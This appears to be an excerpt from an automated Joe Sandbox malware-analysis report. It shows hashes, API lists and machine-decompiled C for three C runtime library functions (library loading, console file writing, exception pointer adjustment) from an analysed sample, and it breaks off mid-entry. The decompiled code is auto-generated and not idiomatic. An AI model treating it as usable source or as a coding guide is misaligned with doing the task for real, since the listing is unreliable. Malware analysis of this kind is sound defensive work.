                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: MessagePostTimer
                                              • String ID: 2$2
                                              • API String ID: 2370412193-3784399050
                                              • Opcode ID: de5cfe9618c366143b12fb912eed1631ec9631a71645c47d229303d1474c6411
                                              • Instruction ID: e77d7ef33314afc2fd51389d51cb3465ee29213223e31bbf595b1b8aef16f1c1
                                              • Opcode Fuzzy Hash: de5cfe9618c366143b12fb912eed1631ec9631a71645c47d229303d1474c6411
                                              • Instruction Fuzzy Hash: 641193B4108204EFD700EF5CC188BA97BE0FB04754F85C4A9E88D8B2A1D7B5DA88CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B26086 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B26086(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00B24A59(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                              0x00b26093
                                              0x00b2609b
                                              0x00b260d0
                                              0x00b2609d
                                              0x00b260a6
                                              0x00000000
                                              0x00b260cd
                                              0x00b260cc
                                              0x00b260cc

                                              APIs
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00B26122,?,?,00000000,?,?,?,00B25F6A,00000000,FlsAlloc,00B2D668,00B2D670), ref: 00B26093
                                              • GetLastError.KERNEL32(?,00B26122,?,?,00000000,?,?,?,00B25F6A,00000000,FlsAlloc,00B2D668,00B2D670,?,?,00B21C2A), ref: 00B2609D
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00B21C2A,00B21D0E,00000003,00B2148B,?,?,?,?,00000000,00000000,00000000), ref: 00B260C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 194327323c770686447c94d16317f8330cedfb59b1bc4f5bb238d7fc7e70578c
                                              • Instruction ID: 87b37d3a0b8c2b5a66d5d69d40c9327d6a4faacce61c0f0fe377c59020b02b9d
                                              • Opcode Fuzzy Hash: 194327323c770686447c94d16317f8330cedfb59b1bc4f5bb238d7fc7e70578c
                                              • Instruction Fuzzy Hash: CDE04F30680208B7EB202F65FC46F5D3BACFB01B40F208571F90DA90E1EFA1D8149944
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B269C1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E00B269C1(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0xb2af8d);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0xb34050; // 0xbb40e64e
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xb362e0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00B21490(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xb362e0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xb362e0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0xb362e0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00B28745(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00B28745(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xb347b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0xb362e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00B28980( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xb347b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0xb362e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E00B1F6B0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0xb362e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00B28980( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00B25A29(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00B1DB25(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}





















































































                                              0x00b269c6
                                              0x00b269c8
                                              0x00b269d3
                                              0x00b269d4
                                              0x00b269d7
                                              0x00b269dc
                                              0x00b269de
                                              0x00b269e4
                                              0x00b269e8
                                              0x00b269ee
                                              0x00b269f3
                                              0x00b269f9
                                              0x00b269fc
                                              0x00b269ff
                                              0x00b26a02
                                              0x00b26a05
                                              0x00b26a08
                                              0x00b26a12
                                              0x00b26a19
                                              0x00b26a21
                                              0x00b26a24
                                              0x00b26a2a
                                              0x00b26a2e
                                              0x00b26a31
                                              0x00b26a35
                                              0x00b26a35
                                              0x00b26a3d
                                              0x00b26a45
                                              0x00b26a4a
                                              0x00b26a4b
                                              0x00b26a4c
                                              0x00b26a4d
                                              0x00b26a50
                                              0x00b26a52
                                              0x00b26a58
                                              0x00b26a5e
                                              0x00b26a61
                                              0x00b26a63
                                              0x00b26a66
                                              0x00b26a6f
                                              0x00b26a75
                                              0x00b26a78
                                              0x00b26a7f
                                              0x00b26a86
                                              0x00b26a89
                                              0x00b26bc3
                                              0x00b26bc7
                                              0x00b26bca
                                              0x00b26bed
                                              0x00b26bf3
                                              0x00b26bf5
                                              0x00b26bf9
                                              0x00b26c2a
                                              0x00b26c2d
                                              0x00b26c2f
                                              0x00000000
                                              0x00b26bfb
                                              0x00b26bfb
                                              0x00b26bfe
                                              0x00b26c01
                                              0x00b26c04
                                              0x00b26d4e
                                              0x00b26d5c
                                              0x00b26d65
                                              0x00b26c0a
                                              0x00b26c14
                                              0x00b26c19
                                              0x00b26c1c
                                              0x00b26c1f
                                              0x00b26c25
                                              0x00000000
                                              0x00b26c25
                                              0x00b26c1f
                                              0x00b26c04
                                              0x00b26bcc
                                              0x00b26bd3
                                              0x00b26bd6
                                              0x00b26bd9
                                              0x00b26bdb
                                              0x00b26bde
                                              0x00b26be5
                                              0x00b26be7
                                              0x00b26c30
                                              0x00b26c33
                                              0x00b26c34
                                              0x00b26c39
                                              0x00b26c3c
                                              0x00b26c3f
                                              0x00b26c45
                                              0x00000000
                                              0x00b26c45
                                              0x00b26c3f
                                              0x00b26a8f
                                              0x00b26a92
                                              0x00b26a94
                                              0x00b26a96
                                              0x00b26a9a
                                              0x00b26a9b
                                              0x00b26a9f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b26a9f
                                              0x00b26aa4
                                              0x00b26aa6
                                              0x00b26aab
                                              0x00b26b6b
                                              0x00b26b72
                                              0x00b26b73
                                              0x00b26b76
                                              0x00b26b78
                                              0x00b26d28
                                              0x00b26d2a
                                              0x00000000
                                              0x00b26d2c
                                              0x00b26d2c
                                              0x00b26d2f
                                              0x00b26d3e
                                              0x00b26d42
                                              0x00b26d43
                                              0x00b26d43
                                              0x00000000
                                              0x00b26d47
                                              0x00000000
                                              0x00b26b7e
                                              0x00b26b83
                                              0x00b26b86
                                              0x00b26b89
                                              0x00b26b8f
                                              0x00b26b98
                                              0x00b26ba3
                                              0x00b26ba8
                                              0x00b26bab
                                              0x00b26bae
                                              0x00b26bb7
                                              0x00b26bb7
                                              0x00b26bba
                                              0x00000000
                                              0x00b26bba
                                              0x00b26bae
                                              0x00b26ab1
                                              0x00b26ab4
                                              0x00b26aba
                                              0x00b26abc
                                              0x00b26ac9
                                              0x00b26aca
                                              0x00b26acd
                                              0x00b26ad0
                                              0x00b26ad5
                                              0x00b26cf9
                                              0x00b26cfb
                                              0x00b26cfd
                                              0x00b26d00
                                              0x00b26d03
                                              0x00b26d0f
                                              0x00b26d12
                                              0x00b26d14
                                              0x00b26d15
                                              0x00b26d19
                                              0x00b26d1c
                                              0x00b26d1c
                                              0x00b26d20
                                              0x00b26d20
                                              0x00b26d20
                                              0x00b26d23
                                              0x00b26d23
                                              0x00b26adb
                                              0x00b26adb
                                              0x00b26ade
                                              0x00b26ae0
                                              0x00b26ae3
                                              0x00b26ae5
                                              0x00b26ae9
                                              0x00b26aea
                                              0x00b26aeb
                                              0x00b26aef
                                              0x00b26af4
                                              0x00b26afe
                                              0x00b26b03
                                              0x00b26b06
                                              0x00b26b06
                                              0x00b26b09
                                              0x00b26b0c
                                              0x00b26b0e
                                              0x00b26b11
                                              0x00b26b1a
                                              0x00b26b1e
                                              0x00b26b1f
                                              0x00b26b26
                                              0x00b26b2c
                                              0x00b26b34
                                              0x00b26b3f
                                              0x00b26b44
                                              0x00b26b4f
                                              0x00b26b54
                                              0x00b26b5a
                                              0x00b26b63
                                              0x00b26bbd
                                              0x00b26bbd
                                              0x00b26c48
                                              0x00b26c4d
                                              0x00b26c5f
                                              0x00b26c64
                                              0x00b26c67
                                              0x00b26c6c
                                              0x00b26c87
                                              0x00b26d6a
                                              0x00b26d70
                                              0x00b26c8d
                                              0x00b26c8d
                                              0x00b26c98
                                              0x00b26c9a
                                              0x00b26c9d
                                              0x00b26ca6
                                              0x00b26cb0
                                              0x00000000
                                              0x00b26cb2
                                              0x00b26cb4
                                              0x00b26cb6
                                              0x00b26ccf
                                              0x00000000
                                              0x00b26cd5
                                              0x00b26cd9
                                              0x00b26cdf
                                              0x00b26ce2
                                              0x00b26ce8
                                              0x00b26ceb
                                              0x00000000
                                              0x00b26ceb
                                              0x00b26cd9
                                              0x00b26ccf
                                              0x00b26cb0
                                              0x00b26ca6
                                              0x00b26c87
                                              0x00b26c6c
                                              0x00b26b5a
                                              0x00b26ad5
                                              0x00b26aab
                                              0x00000000
                                              0x00b26cee
                                              0x00b26cee
                                              0x00b26cf7
                                              0x00b26d72
                                              0x00b26d77
                                              0x00b26d7f
                                              0x00b26d80
                                              0x00b26d81
                                              0x00b26d8d
                                              0x00000000

                                              APIs
                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,?,00000000,?), ref: 00B26A24
                                                • Part of subcall function 00B25A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B2649D,?,00000000,-00000008), ref: 00B25AD5
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B26C7F
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B26CC7
                                              • GetLastError.KERNEL32 ref: 00B26D6A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                              • String ID:
                                              • API String ID: 2112829910-0
                                              • Opcode ID: 88cde4cd0b3141dbf989e5ee2aff46f1330b0e00c9cf306721cc4a941e51f132
                                              • Instruction ID: ae88dde21ea68ad2baf61aec3781a0d31e9043732080261fd59f716421e6a2d3
                                              • Opcode Fuzzy Hash: 88cde4cd0b3141dbf989e5ee2aff46f1330b0e00c9cf306721cc4a941e51f132
                                              • Instruction Fuzzy Hash: EAD15C75E042689FCF15CFA8E880AADBBF5FF09344F2845AAE859E7351D730A941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B278AB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E00B278AB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0xb33388);
				E00B1D900(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00B1F6B0(_t107, E00B1DD40(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00B1F6B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xb35dcc;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xb37000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00B21BDC(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0xb333a8);
									E00B1D900(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00B278AB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00B2733D(_t103, _t108[0x18], E00B1DD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00B2734D(_t103, _t108[0x18], E00B1DD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00B1DD40();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                              0x00b278ab
                                              0x00b278ad
                                              0x00b278b2
                                              0x00b278b7
                                              0x00b278b9
                                              0x00b278bc
                                              0x00b278c1
                                              0x00b279d1
                                              0x00b279d1
                                              0x00b279d1
                                              0x00000000
                                              0x00b278d0
                                              0x00b278d0
                                              0x00b278d5
                                              0x00b278df
                                              0x00b278e1
                                              0x00b278e6
                                              0x00b278eb
                                              0x00b278eb
                                              0x00b278ed
                                              0x00b278f0
                                              0x00b278f5
                                              0x00b27917
                                              0x00b27917
                                              0x00b2791a
                                              0x00b2791d
                                              0x00b2793b
                                              0x00b2793e
                                              0x00b2797d
                                              0x00b27980
                                              0x00b27983
                                              0x00b279a8
                                              0x00b279aa
                                              0x00000000
                                              0x00b279ac
                                              0x00b279ac
                                              0x00b279ae
                                              0x00000000
                                              0x00b279b0
                                              0x00b279b0
                                              0x00b279b5
                                              0x00b279b9
                                              0x00b279b9
                                              0x00b279ba
                                              0x00000000
                                              0x00b279ba
                                              0x00b279ae
                                              0x00b27985
                                              0x00b27985
                                              0x00b27987
                                              0x00000000
                                              0x00b27989
                                              0x00b27989
                                              0x00b2798b
                                              0x00000000
                                              0x00b2798d
                                              0x00b2799e
                                              0x00000000
                                              0x00b279a3
                                              0x00b2798b
                                              0x00b27987
                                              0x00b27940
                                              0x00b27940
                                              0x00b27944
                                              0x00000000
                                              0x00b2794a
                                              0x00b2794a
                                              0x00b2794c
                                              0x00000000
                                              0x00b27952
                                              0x00b27959
                                              0x00b27961
                                              0x00b27965
                                              0x00b27967
                                              0x00b2796a
                                              0x00b2796f
                                              0x00b27970
                                              0x00000000
                                              0x00b27970
                                              0x00b2796a
                                              0x00000000
                                              0x00b27965
                                              0x00b2794c
                                              0x00b27944
                                              0x00b2791f
                                              0x00b2791f
                                              0x00000000
                                              0x00b2791f
                                              0x00b278fc
                                              0x00b278fc
                                              0x00b27901
                                              0x00b27906
                                              0x00000000
                                              0x00b27908
                                              0x00b2790a
                                              0x00b27913
                                              0x00b27922
                                              0x00b27924
                                              0x00b279e3
                                              0x00b279e3
                                              0x00b279e8
                                              0x00b279e9
                                              0x00b279eb
                                              0x00b279f0
                                              0x00b279f5
                                              0x00b279f8
                                              0x00b279fb
                                              0x00b279fe
                                              0x00b27a07
                                              0x00b27a07
                                              0x00b27a00
                                              0x00b27a00
                                              0x00b27a00
                                              0x00b27a0a
                                              0x00b27a0e
                                              0x00b27a11
                                              0x00b27a12
                                              0x00b27a13
                                              0x00b27a14
                                              0x00b27a17
                                              0x00b27a20
                                              0x00b27a20
                                              0x00b27a23
                                              0x00b27a59
                                              0x00b27a25
                                              0x00b27a25
                                              0x00b27a25
                                              0x00b27a28
                                              0x00b27a3f
                                              0x00b27a3f
                                              0x00b27a28
                                              0x00b27a5e
                                              0x00b27a68
                                              0x00b27a74
                                              0x00b27932
                                              0x00b27932
                                              0x00b27937
                                              0x00b27938
                                              0x00b27972
                                              0x00b27979
                                              0x00b279bd
                                              0x00b279bd
                                              0x00b279c4
                                              0x00b279d3
                                              0x00b279d6
                                              0x00b279e2
                                              0x00b279e2
                                              0x00b27924
                                              0x00b27906
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b278d5

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: e8091cadfab2c72a315a661d9b894d9e2c75e272234ce5991c6a0e9a18e6013e
